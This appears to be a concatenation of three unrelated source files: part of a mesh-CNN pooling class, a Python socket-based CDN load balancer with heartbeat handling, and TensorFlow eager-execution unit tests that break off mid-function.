MeshPool.__union_groups(mesh, edge_groups, key_b, edge_id) # (33x33), 18, 19, groups[19, :] = all zeros except at 18, 19, 20 position
MeshPool.__union_groups(mesh, edge_groups, key_a, update_key_a) # groups[15,:] = all zeros except at position 20, 15
MeshPool.__union_groups(mesh, edge_groups, middle_edge, update_key_a) # groups[15,:] = all zeros except at position 20, 15, 25
MeshPool.__union_groups(mesh, edge_groups, key_b, update_key_b) # groups[8,:] = all zeros except at position 18, 8
MeshPool.__union_groups(mesh, edge_groups, middle_edge, update_key_b) # groups[8,:] = all zeros except at position 18, 8, 25
return [key_a, key_b, middle_edge] # 20, 18, 25, (GF, GJ, GK) edges are considered invalid
@staticmethod
def __redirect_edges(mesh, edge_a_key, side_a, edge_b_key, side_b):
# 19 - FJ, side_a = 0, CF - edge_b_key = 15, side_b = 3
# 19 - gemm edges [20, 18, 5, 12] # FG, JG, IJ, IF
# 15 - gemm edges [16, 17, 22, 20] # BF, BC, CG, FG
# mesh.sides[19] - [1,0,3,2], mesh.sides[15] - [1,0,3,2]
mesh.gemm_edges[edge_a_key, side_a] = edge_b_key # replace FG with FK
mesh.gemm_edges[edge_b_key, side_b] = edge_a_key # replace FG with FJ
mesh.sides[edge_a_key, side_a] = side_b # mesh.sides[19, 0] = 3
mesh.sides[edge_b_key, side_b] = side_a # mesh.sides[15, 3] = 0
# mesh.gemm_edges[19] = [20, 18, 5, 12] -> [15, 18, 5, 12]
# mesh.gemm_edges[15] = [16, 17, 22, 20] -> [16, 17, 22, 19]
# second time
# mesh.gemm_edges[19] = [15, 18, 5, 12] -> [15, 8, 5, 12]
# mesh.gemm_edges[8] = [6, 7, 18, 25] -> [6, 7, 19, 25]
# 19 - FJ, side_a = 1, side_b = 2, JK edge_b_key = 8, gemm edges a - FK, JK, IJ, IF
# gemm edges b - NK, NJ, JG, GK
# 19 - gemm edges [15, 8, 5, 12] # replace 8 with 8
# 8 - gemm edges [ 6, 7, 18, 25] # replace 18 with 19 , replace JG with FJ
# third time
# 15, 2, 8, 3
# mesh.gemm_edges[15] = [16, 17, 22, 19] -> [16, 17, 8, 19]
# mesh.gemm_edges[8] = [6, 7, 19, 25] -> [6,7, 19, 15]
# in total final gemm_edges are as follows
# mesh.gemm_edges[19] = [15, 8, 5, 12]
# mesh.gemm_edges[15] = [16, 17, 8, 19]
# mesh.gemm_edges[8] = [6, 7, 19, 15]
@staticmethod
def __get_shared_items(list_a, list_b):
# [1, 30], [29, 3]
shared_items = []
for i in range(len(list_a)):
for j in range(len(list_b)):
if list_a[i] == list_b[j]:
shared_items.extend([i, j])
return shared_items
@staticmethod
def __get_other_side(side):
return side + 1 - 2 * (side % 2)
# oside for updated side a -> 3 + 1 - 2* (3 % 2) = 2
# oside for updated side b -> 2 + 1 - 2*(2%2) = 3
@staticmethod
def __get_face_info(mesh, edge_id, side):
'''
key_a - edge_id of sister edge, JG
key_b - edge_id of sister edge, GK
Sides tell the order in which the edge neighbors are placed
side_a -
'''
key_a = mesh.gemm_edges[edge_id, side]
key_b = mesh.gemm_edges[edge_id, side + 1]
side_a = mesh.sides[edge_id, side]
side_b = mesh.sides[edge_id, side + 1]
other_side_a = (side_a - (side_a % 2) + 2) % 4
other_side_b = (side_b - (side_b % 2) + 2) % 4
other_keys_a = [mesh.gemm_edges[key_a, other_side_a], mesh.gemm_edges[key_a, other_side_a + 1]]
other_keys_b = [mesh.gemm_edges[key_b, other_side_b], mesh.gemm_edges[key_b, other_side_b + 1]]
return key_a, key_b, side_a, side_b, other_side_a, other_side_b, other_keys_a, other_keys_b
@staticmethod
def __remove_triplete(mesh, mask, edge_groups, invalid_edges):
vertex = set(mesh.edges[invalid_edges[0]])
for edge_key in invalid_edges:
vertex &= set(mesh.edges[edge_key])
mask[edge_key] = False
MeshPool.__remove_group(mesh, edge_groups, edge_key)
mesh.edges_count -= 3
vertex = list(vertex)
assert(len(vertex) == 1)
mesh.remove_vertex(vertex[0])
def __build_queue(self, features, edges_count):
# features - [16, 16]
        # create a heap keyed on the squared L2 norm of each edge's features
        # we do this because the edges with the smallest squared norm are deleted first
squared_magnitude = torch.sum(features * features, 0) # shape -> [16,]
if squared_magnitude.shape[-1] != 1:
squared_magnitude = squared_magnitude.unsqueeze(-1) # shape -> [16, 1]
edge_ids = torch.arange(edges_count, device=squared_magnitude.device, dtype=torch.float32).unsqueeze(-1) # 16 x 1
heap = torch.cat((squared_magnitude, edge_ids), dim=-1).tolist()
heapify(heap)
return heap
@staticmethod
def __union_groups(mesh, edge_groups, source, target):
edge_groups.union(source, target) # zeros(33x33), 20, 19
mesh.union_groups(source, target)
@staticmethod
def __remove_group(mesh, edge_groups, index):
edge_groups.remove_group(index)
mesh.remove_group(index)
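# Hedged sketch (illustrative only, not part of the original model; the feature
# values are made up): the priority queue that __build_queue constructs can be
# reproduced on toy data as below. Edges with the smallest squared feature
# magnitude sit at the top of the heap and are pooled first.
if __name__ == "__main__":
    toy_features = torch.tensor([[1., 0., 2., 1.],
                                 [0., 1., 2., 0.]])   # shape [channels, edges]
    squared_magnitude = torch.sum(toy_features * toy_features, 0).unsqueeze(-1)
    edge_ids = torch.arange(toy_features.shape[1], dtype=torch.float32).unsqueeze(-1)
    heap = torch.cat((squared_magnitude, edge_ids), dim=-1).tolist()
    heapify(heap)
    print(heappop(heap))  # -> [1.0, 0.0]: edge 0 pops first (ties broken by edge id)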
|
loadBalancerPrimary.py
|
# receives request from the clients and forwards it to appropriate edgeServer/originServer
import sys
import socket
from threading import Timer, Thread, Lock
import time
sys.path.insert(0, "../")
from config import *
from messages.dns_request_message import *
from messages.lb_heartbeat_message import *
from messages.edge_heartbeat_message import *
from messages.client_req_lb_message import *
from messages.client_res_lb_message import *
####################################
# Global tables and lock variables #
####################################
edge_servers_available = [] # (loc_id, (ip,port)) entries
edge_servers_availableL = Lock()
edge_server_load = {}
edge_server_load_l = Lock()
####################################
def heartBeat():
while(True):
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = LOAD_BALANCER_PRIMARY_IP
port = LB_HEARTBEAT_PORT
sock.bind((host, port))
sock.listen(1)
print("LB-LB Heartbeat socket binded")
conn, addr = sock.accept()
print('Accepted', conn, 'from', addr)
print('Connected to backup load balancer')
while(True):
print("Sent HeartBeat")
msg = LBHeartbeatMessage()
try:
msg.send(conn)
except:
print("Connection to backup failed")
break
time.sleep(LB_HEARTBEAT_TIME)
def receive_heartbeat(conn, addr):
global edge_servers_available, edge_servers_availableL, edge_server_load, edge_server_load_l
print("Connection Established with ", addr)
# Edge server added
msg = EdgeHeartbeatMessage()
msg.receive(conn)
prev_load = -1
if msg.received:
print("New edge server connected", addr)
# prev_load = msg.load
edge_server_load_l.acquire()
edge_server_load[addr] = msg.load
edge_server_load_l.release()
prev_load = msg.load
edge_servers_availableL.acquire()
edge_servers_available.append((msg.loc, addr,msg.load))
edge_servers_availableL.release()
# Check for liveness
while True:
msg = EdgeHeartbeatMessage()
msg.receive(conn)
if msg.received == False:
break
if prev_load!=msg.load:
edge_server_load_l.acquire()
edge_server_load[addr] = msg.load
edge_server_load_l.release()
prev_load = msg.load
print("Heartbeat received from", addr)
print("Edge server ", addr, " failed")
# Edge server removed
for e,a in enumerate(edge_servers_available):
if a[1] == addr:
edge_servers_availableL.acquire()
edge_servers_available.pop(e)
edge_servers_availableL.release()
edge_server_load_l.acquire()
del edge_server_load[addr]
edge_server_load_l.release()
break
conn.close()
def edge_heartbeat_handler():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = LOAD_BALANCER_PRIMARY_IP
port = LB1_HEARTBEAT_LISTENER_PORT
sock.bind((host,port))
sock.listen(MAX_EDGE_SERVERS)
threads = []
while True:
c, addr = sock.accept()
t = Thread(target = receive_heartbeat,args = (c,addr))
threads.append(t)
t.start()
sock.close()
def dist(loc_id1, loc_id2):
global LOCATION
print(LOCATION[loc_id1])
return (LOCATION[loc_id1][0]-LOCATION[loc_id2][0])**2 + (LOCATION[loc_id1][1]-LOCATION[loc_id2][1])**2
def serve_client(conn, addr):
global edge_servers_available, edge_servers_availableL, edge_server_load, edge_server_load_l
msg = ClientReqLBMessage()
msg.receive(conn)
if msg.received:
print("Received request: loc id ", msg.loc_id, " from ", addr)
loc_id = msg.loc_id
# look in edge_servers_available after acquiring lock
edge_servers_availableL.acquire()
        # Fast paths: exactly one edge server available, or none available yet
if(len(edge_servers_available)==1):
msg = ClientResLBMessage(*edge_servers_available[0][1])
edge_servers_availableL.release()
msg.send(conn)
conn.close()
return
if(len(edge_servers_available)==0):
msg = ClientResLBMessage('0.0.0.0',EDGE_SERVER_PORT)
edge_servers_availableL.release()
msg.send(conn)
conn.close()
return
min_dist = sys.maxsize
cur_load = sys.maxsize
best_server_index = 0
for e,server in enumerate(edge_servers_available):
if server[1]==msg.prev_edge_ip:
if e == 0:
best_server_index = 1
continue
cur_dist = dist(server[0], loc_id)
edge_server_load_l.acquire()
if WEIGHT_DISTANCE*min_dist+WEIGHT_LOAD*cur_load > WEIGHT_DISTANCE*cur_dist+WEIGHT_LOAD*edge_server_load[edge_servers_available[e][1]]:
min_dist = cur_dist
cur_load = edge_server_load[edge_servers_available[e][1]]
best_server_index = e
edge_server_load_l.release()
msg = ClientResLBMessage(*edge_servers_available[best_server_index][1])
edge_servers_availableL.release()
msg.send(conn)
conn.close()
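# Hedged worked example (the weights and numbers below are made up; the real
# values come from config.py): serve_client picks the edge server minimising
#   WEIGHT_DISTANCE * dist(server_loc, client_loc) + WEIGHT_LOAD * load.
# With WEIGHT_DISTANCE = 1 and WEIGHT_LOAD = 10, a server at squared distance 25
# with load 2 scores 1*25 + 10*2 = 45 and beats a closer server at squared
# distance 4 with load 5, which scores 1*4 + 10*5 = 54, so a lightly loaded far
# server can win depending on the configured weights.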
if __name__ == "__main__":
# Secondary Heartbeat thread
t_secondary_hb = Thread(target=heartBeat)
t_secondary_hb.start()
# Edge server handler thread
t_edge_server_hb = Thread(target = edge_heartbeat_handler)
t_edge_server_hb.start()
# Register itself to DNS
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = DNS_IP
port = DNS_PORT
s.connect((host, port))
print("Adding IP to DNS")
msg = DNSRequestMessage(0, "www.mycdn.com", LOAD_BALANCER_PRIMARY_IP, LB_CLIENT_LISTEN_PORT)
msg.send(s)
s.close()
# Serve clients
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = LOAD_BALANCER_PRIMARY_IP
port = LB_CLIENT_LISTEN_PORT
sock.bind((host,port))
sock.listen(MAX_CLIENT_REQUESTS)
while(True):
c, addr = sock.accept()
t = Thread(target = serve_client,args = (c,addr))
t.start()
# Wait for other threads
t_secondary_hb.join()
t_edge_server_hb.join()
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
import collections.abc
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tfe
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return array_ops.identity(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
@test_util.with_eager_op_as_function
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.abc.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.abc.Hashable)
with self.assertRaisesRegex(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
      # Note: even though element-wise comparison should make these ambiguous,
      # both TF and numpy fall back on object identity for list elements, so
      # lists containing the same objects compare equal without raising an error
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similar to lists we shouldn't be able to do a `in` check such as
# `if a in [a,b]`. However if `a` is the first element, it works due to
# short circuiting
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
# TODO(b/207402791): re-enable once incompatible shapes supported by XLA.
if not test_util.is_xla_enabled():
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
@test_util.disable_tfrt('Get execution mode not supported in TFRT.')
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(ctx.list_logical_devices('CPU')[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
gpus = ctx.list_logical_devices('GPU')
if gpus:
with ctx.device(gpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testDevice_supportsLogicalDevice(self):
ctx = context.Context()
cpus = ctx.list_logical_devices('CPU')
with ctx.device(cpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
def testDevice_supportsDeviceSpec(self):
ctx = context.Context()
device_name = '/job:localhost/replica:0/task:0/device:CPU:0'
device_spec = pydev.DeviceSpec.from_string(device_name)
with ctx.device(device_spec):
self.assertEqual(device_name, ctx.device_name)
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
@test_util.disable_tfrt('Multi CPU placement not supported yet.')
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = array_ops.identity(1.0)
with ops.device('cpu:0'):
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('GPU:0'):
x = array_ops.identity(1.0)
self.assertEndsWith(x.device, 'GPU:0')
y = array_ops.identity(x)
# The value we test y.device against depends on what the default placement
# behavior is when no device is explicitly specified in the context. This
# behavior is subject to change (for example, in the future we may want to
# use GPUs, if available, when no device is explicitly provided).
self.assertEqual(y.device, current_device())
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
@test_util.disable_tfrt('Context config not supported in TFRT.')
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEqual(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegex(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
cpu.__exit__()
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if y were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the CPU device, the read op runs
# on the device where the handle lives.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.context().executor.wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.context().executor.wait()
context.context().executor.clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
@test_util.disable_tfrt('ContextFromInterface not implemented.')
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
with ops.device('CPU:0'):
test_var = variables.Variable([2., 3.])
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
self.assertAllEqual(test_fn(test_var), 1.0)
@test_util.disable_tfrt('PyFunc is not supported in TFRT.')
def testPyFunctionAsync(self):
self.skipTest('flaky; b/194307407')
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
result = test_fn(test_var)
context.async_wait()
self.assertAllEqual(result, 3.0)
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tfe.TFE_Py_RegisterExceptionClass(str)
pywrap_tfe.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
# TODO(b/149995282): When an exception is thrown in ASYNC mode, it seems
# there are things left over that cause mutex corruption when
# _reset_context() is called before the next test is executed.
#
# context.set_execution_mode(context.ASYNC)
# with self.assertRaises(errors.InvalidArgumentError):
# execute(
# b'MatMul',
# num_outputs=1,
# inputs=[three, five],
# attrs=('transpose_a', False, 'transpose_b', False, 'T',
# three.dtype.as_datatype_enum))
# context.context().executor.wait()
#
context.context().executor.clear_error()
context.context().execution_mode = context.SYNC
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooManyNumOutputs(self):
